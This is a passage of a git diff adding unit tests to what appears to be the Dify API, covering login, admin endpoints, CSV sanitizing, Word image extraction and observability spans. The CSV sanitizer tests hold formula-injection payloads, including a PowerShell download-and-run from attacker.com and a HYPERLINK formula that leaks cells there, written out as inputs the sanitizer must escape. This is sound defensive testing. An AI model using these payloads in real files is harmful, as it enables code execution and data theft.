+334,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -349,7 +361,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "different@example.com", "password": "ValidPass123!", "invite_token": "token"}, + json={ + "email": "different@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "token", + }, ): login_api = LoginApi() with pytest.raises(InvalidEmailError): diff --git a/api/tests/unit_tests/controllers/console/test_admin.py b/api/tests/unit_tests/controllers/console/test_admin.py new file mode 100644 index 0000000000..e0ddf6542e --- /dev/null +++ b/api/tests/unit_tests/controllers/console/test_admin.py @@ -0,0 +1,407 @@ +"""Final working unit tests for admin endpoints - tests business logic directly.""" + +import uuid +from unittest.mock import Mock, patch + +import pytest +from werkzeug.exceptions import NotFound, Unauthorized + +from controllers.console.admin import InsertExploreAppPayload +from models.model import App, RecommendedApp + + +class TestInsertExploreAppPayload: + """Test InsertExploreAppPayload validation.""" + + def test_valid_payload(self): + """Test creating payload with valid data.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer text", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc == payload_data["desc"] + assert payload.copyright == payload_data["copyright"] + assert payload.privacy_policy == payload_data["privacy_policy"] + assert payload.custom_disclaimer == payload_data["custom_disclaimer"] + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_minimal_payload(self): + """Test creating payload with only required fields.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + payload = InsertExploreAppPayload.model_validate(payload_data) + + assert payload.app_id == payload_data["app_id"] + assert payload.desc is None + assert payload.copyright is None + assert payload.privacy_policy is None + assert payload.custom_disclaimer is None + assert payload.language == payload_data["language"] + assert payload.category == payload_data["category"] + assert payload.position == payload_data["position"] + + def test_invalid_language(self): + """Test payload with invalid language code.""" + payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", + "category": "Productivity", + "position": 1, + } + + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(payload_data) + + +class TestAdminRequiredDecorator: + """Test admin_required decorator.""" + + def setup_method(self): + """Set up test fixtures.""" + # Mock dify_config + self.dify_config_patcher = patch("controllers.console.admin.dify_config") + self.mock_dify_config = self.dify_config_patcher.start() + self.mock_dify_config.ADMIN_API_KEY = "test-admin-key" + + # Mock extract_access_token + self.token_patcher = patch("controllers.console.admin.extract_access_token") + self.mock_extract_token = self.token_patcher.start() + + def teardown_method(self): + """Clean up test fixtures.""" + self.dify_config_patcher.stop() + self.token_patcher.stop() + + def test_admin_required_success(self): + """Test successful admin authentication.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "test-admin-key" + result = test_view() + assert result["success"] is True + + def test_admin_required_invalid_token(self): + """Test admin_required with invalid token.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = "wrong-key" + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_no_api_key_configured(self): + """Test admin_required when no API key is configured.""" + from controllers.console.admin import admin_required + + self.mock_dify_config.ADMIN_API_KEY = None + + @admin_required + def test_view(): + return {"success": True} + + with pytest.raises(Unauthorized, match="API key is invalid"): + test_view() + + def test_admin_required_missing_authorization_header(self): + """Test admin_required with missing authorization header.""" + from controllers.console.admin import admin_required + + @admin_required + def test_view(): + return {"success": True} + + self.mock_extract_token.return_value = None + with pytest.raises(Unauthorized, match="Authorization header is missing"): + test_view() + + +class TestExploreAppBusinessLogicDirect: + """Test the core business logic of explore app management directly.""" + + def test_data_fusion_logic(self): + """Test the data fusion logic between payload and site data.""" + # Test cases for different data scenarios + test_cases = [ + { + "name": "site_data_overrides_payload", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": {"description": "Site desc", "copyright": "Site copyright"}, + "expected": { + "desc": "Site desc", + "copyright": "Site copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "payload_used_when_no_site", + "payload": {"desc": "Payload desc", "copyright": "Payload copyright"}, + "site": None, + "expected": { + "desc": "Payload desc", + "copyright": "Payload copyright", + "privacy_policy": "", + "custom_disclaimer": "", + }, + }, + { + "name": "empty_defaults_when_no_data", + "payload": {}, + "site": None, + "expected": {"desc": "", "copyright": "", "privacy_policy": "", "custom_disclaimer": ""}, + }, + ] + + for case in test_cases: + # Simulate the data fusion logic + payload_desc = case["payload"].get("desc") + payload_copyright = case["payload"].get("copyright") + payload_privacy_policy = case["payload"].get("privacy_policy") + payload_custom_disclaimer = case["payload"].get("custom_disclaimer") + + if case["site"]: + site_desc = case["site"].get("description") + site_copyright = case["site"].get("copyright") + site_privacy_policy = case["site"].get("privacy_policy") + site_custom_disclaimer = case["site"].get("custom_disclaimer") + + # Site data takes precedence + desc = site_desc or payload_desc or "" + copyright = site_copyright or payload_copyright or "" + privacy_policy = site_privacy_policy or payload_privacy_policy or "" + custom_disclaimer = site_custom_disclaimer or payload_custom_disclaimer or "" + else: + # Use payload data or empty defaults + desc = payload_desc or "" + copyright = payload_copyright or "" + privacy_policy = payload_privacy_policy or "" + custom_disclaimer = payload_custom_disclaimer or "" + + result = { + "desc": desc, + "copyright": copyright, + "privacy_policy": privacy_policy, + "custom_disclaimer": custom_disclaimer, + } + + assert result == case["expected"], f"Failed test case: {case['name']}" + + def test_app_visibility_logic(self): + """Test that apps are made public when added to explore list.""" + # Create a mock app + mock_app = Mock(spec=App) + mock_app.is_public = False + + # Simulate the business logic + mock_app.is_public = True + + assert mock_app.is_public is True + + def test_recommended_app_creation_logic(self): + """Test the creation of RecommendedApp objects.""" + app_id = str(uuid.uuid4()) + payload_data = { + "app_id": app_id, + "desc": "Test app description", + "copyright": "© 2024 Test Company", + "privacy_policy": "https://example.com/privacy", + "custom_disclaimer": "Custom disclaimer", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # Simulate the creation logic + recommended_app = Mock(spec=RecommendedApp) + recommended_app.app_id = payload_data["app_id"] + recommended_app.description = payload_data["desc"] + recommended_app.copyright = payload_data["copyright"] + recommended_app.privacy_policy = payload_data["privacy_policy"] + recommended_app.custom_disclaimer = payload_data["custom_disclaimer"] + recommended_app.language = payload_data["language"] + recommended_app.category = payload_data["category"] + recommended_app.position = payload_data["position"] + + # Verify the data + assert recommended_app.app_id == app_id + assert recommended_app.description == "Test app description" + assert recommended_app.copyright == "© 2024 Test Company" + assert recommended_app.privacy_policy == "https://example.com/privacy" + assert recommended_app.custom_disclaimer == "Custom disclaimer" + assert recommended_app.language == "en-US" + assert recommended_app.category == "Productivity" + assert recommended_app.position == 1 + + def test_recommended_app_update_logic(self): + """Test the update logic for existing RecommendedApp objects.""" + mock_recommended_app = Mock(spec=RecommendedApp) + + update_data = { + "desc": "Updated description", + "copyright": "© 2024 Updated", + "language": "fr-FR", + "category": "Tools", + "position": 2, + } + + # Simulate the update logic + mock_recommended_app.description = update_data["desc"] + mock_recommended_app.copyright = update_data["copyright"] + mock_recommended_app.language = update_data["language"] + mock_recommended_app.category = update_data["category"] + mock_recommended_app.position = update_data["position"] + + # Verify the updates + assert mock_recommended_app.description == "Updated description" + assert mock_recommended_app.copyright == "© 2024 Updated" + assert mock_recommended_app.language == "fr-FR" + assert mock_recommended_app.category == "Tools" + assert mock_recommended_app.position == 2 + + def test_app_not_found_error_logic(self): + """Test error handling when app is not found.""" + app_id = str(uuid.uuid4()) + + # Simulate app lookup returning None + found_app = None + + # Test the error condition + if not found_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found"): + raise NotFound(f"App '{app_id}' is not found") + + def test_recommended_app_not_found_error_logic(self): + """Test error handling when recommended app is not found for deletion.""" + app_id = str(uuid.uuid4()) + + # Simulate recommended app lookup returning None + found_recommended_app = None + + # Test the error condition + if not found_recommended_app: + with pytest.raises(NotFound, match=f"App '{app_id}' is not found in the explore list"): + raise NotFound(f"App '{app_id}' is not found in the explore list") + + def test_database_session_usage_patterns(self): + """Test the expected database session usage patterns.""" + # Mock session usage patterns + mock_session = Mock() + + # Test session.add pattern + mock_recommended_app = Mock(spec=RecommendedApp) + mock_session.add(mock_recommended_app) + mock_session.commit() + + # Verify session was used correctly + mock_session.add.assert_called_once_with(mock_recommended_app) + mock_session.commit.assert_called_once() + + # Test session.delete pattern + mock_recommended_app_to_delete = Mock(spec=RecommendedApp) + mock_session.delete(mock_recommended_app_to_delete) + mock_session.commit() + + # Verify delete pattern + mock_session.delete.assert_called_once_with(mock_recommended_app_to_delete) + + def test_payload_validation_integration(self): + """Test payload validation in the context of the business logic.""" + # Test valid payload + valid_payload_data = { + "app_id": str(uuid.uuid4()), + "desc": "Test app description", + "language": "en-US", + "category": "Productivity", + "position": 1, + } + + # This should succeed + payload = InsertExploreAppPayload.model_validate(valid_payload_data) + assert payload.app_id == valid_payload_data["app_id"] + + # Test invalid payload + invalid_payload_data = { + "app_id": str(uuid.uuid4()), + "language": "invalid-lang", # This should fail validation + "category": "Productivity", + "position": 1, + } + + # This should raise an exception + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + InsertExploreAppPayload.model_validate(invalid_payload_data) + + +class TestExploreAppDataHandling: + """Test specific data handling scenarios.""" + + def test_uuid_validation(self): + """Test UUID validation and handling.""" + # Test valid UUID + valid_uuid = str(uuid.uuid4()) + + # This should be a valid UUID + assert uuid.UUID(valid_uuid) is not None + + # Test invalid UUID + invalid_uuid = "not-a-valid-uuid" + + # This should raise a ValueError + with pytest.raises(ValueError): + uuid.UUID(invalid_uuid) + + def test_language_validation(self): + """Test language validation against supported languages.""" + from constants.languages import supported_language + + # Test supported language + assert supported_language("en-US") == "en-US" + assert supported_language("fr-FR") == "fr-FR" + + # Test unsupported language + with pytest.raises(ValueError, match="invalid-lang is not a valid language"): + supported_language("invalid-lang") + + def test_response_formatting(self): + """Test API response formatting.""" + # Test success responses + create_response = {"result": "success"} + update_response = {"result": "success"} + delete_response = None # 204 No Content returns None + + assert create_response["result"] == "success" + assert update_response["result"] == "success" + assert delete_response is None + + # Test status codes + create_status = 201 # Created + update_status = 200 # OK + delete_status = 204 # No Content + + assert create_status == 201 + assert update_status == 200 + assert delete_status == 204 diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..fd0b0e2e44 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,85 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. + +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == 